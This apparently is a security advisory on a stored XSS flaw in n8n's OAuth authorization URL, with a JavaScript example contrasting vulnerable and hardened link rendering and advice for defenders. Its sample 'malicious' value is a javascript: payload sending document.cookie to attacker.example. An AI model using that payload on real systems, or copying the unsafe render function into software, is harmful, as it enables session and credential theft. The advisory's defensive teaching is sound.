OAuth vulnerability in n8n automation platform could lead to system compromise

Summary

Researchers at Imperva have disclosed a stored cross-site scripting (XSS) vulnerability in the n8n workflow automation platform, caused by improper sanitization of the OAuth authorization URL that a credential can carry. An attacker who already has access to a victim's n8n instance could store a malicious URL so that the injected script runs in another user's browser session, allowing exfiltration of stored credentials and potentially full compromise of the platform.
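The root cause described above is a user-controlled URL that is stored and later rendered as a clickable link without checking its scheme. The following is an added example, not n8n's code and not from the Imperva write-up: it contrasts the unsafe pattern (interpolating the stored value straight into an `href`) with a hardened one that parses the value with the WHATWG `URL` API, allows only absolute `https:` URLs without embedded credentials, and HTML-escapes the normalized result. All function names are illustrative assumptions.

```javascript
// Added example (not n8n's code): validating a stored OAuth authorization URL
// before it is rendered as a link, to prevent javascript:/data: stored XSS.

// Returns the normalized https:// URL string, or null if the value is unsafe.
// Uses the global WHATWG URL class available in Node.js and browsers.
function normalizeAuthorizationUrl(raw) {
  let parsed;
  try {
    parsed = new URL(String(raw).trim());   // rejects relative or garbage input
  } catch {
    return null;
  }
  // Scheme allow-list: this is the check that blocks javascript:, data:,
  // vbscript: and also downgrades to plain http:. URL lowercases the scheme,
  // so mixed-case tricks such as "JaVaScRiPt:" are caught too.
  if (parsed.protocol !== 'https:') return null;
  // Refuse embedded credentials in the authority (user:pass@host).
  if (parsed.username || parsed.password) return null;
  return parsed.href;                        // canonical form (lowercased host, etc.)
}

function isSafeAuthorizationUrl(raw) {
  return normalizeAuthorizationUrl(raw) !== null;
}

// Minimal escaping for an HTML attribute value.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// VULNERABLE pattern: whatever was stored becomes the link target verbatim.
// A stored "javascript:..." value executes when a victim clicks "Connect".
function renderConnectLinkUnsafe(storedAuthUrl) {
  return `<a href="${storedAuthUrl}">Connect</a>`;
}

// HARDENED pattern: validate scheme first, then escape before interpolating.
function renderConnectLinkSafe(storedAuthUrl) {
  const safeUrl = normalizeAuthorizationUrl(storedAuthUrl);
  if (safeUrl === null) {
    throw new Error('authorization URL must be an absolute https:// URL');
  }
  return `<a href="${escapeHtmlAttr(safeUrl)}" rel="noopener noreferrer">Connect</a>`;
}

// Constructed sample values illustrating the two paths.
const benign = 'https://accounts.example.com/o/oauth2/auth';
const malicious = 'javascript:fetch("https://attacker.example/?c="+document.cookie)';
console.log(renderConnectLinkUnsafe(malicious)); // script-bearing href survives
console.log(renderConnectLinkSafe(benign));      // normalized, escaped https link
```

Applying the scheme check at write time (when the credential is saved) as well as at render time is the safer choice: the render-time check protects existing stored data, while the write-time check gives the user an immediate error instead of a broken link later.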

IFF Assessment

FOE

Successful exploitation gives an attacker control of an automation platform that typically holds credentials for many downstream services, enabling bulk credential exfiltration and a wider compromise of the systems those credentials unlock.

Defender Context

This vulnerability highlights the risk concentrated in centralized automation platforms like n8n, which act as a single point of trust holding credentials for many services. Defenders should treat such platforms as critical assets: restrict who can create or edit credentials and workflows, limit which users can reach the instance at all, and patch promptly, since a single stored XSS in a shared console can expose every credential the platform holds.
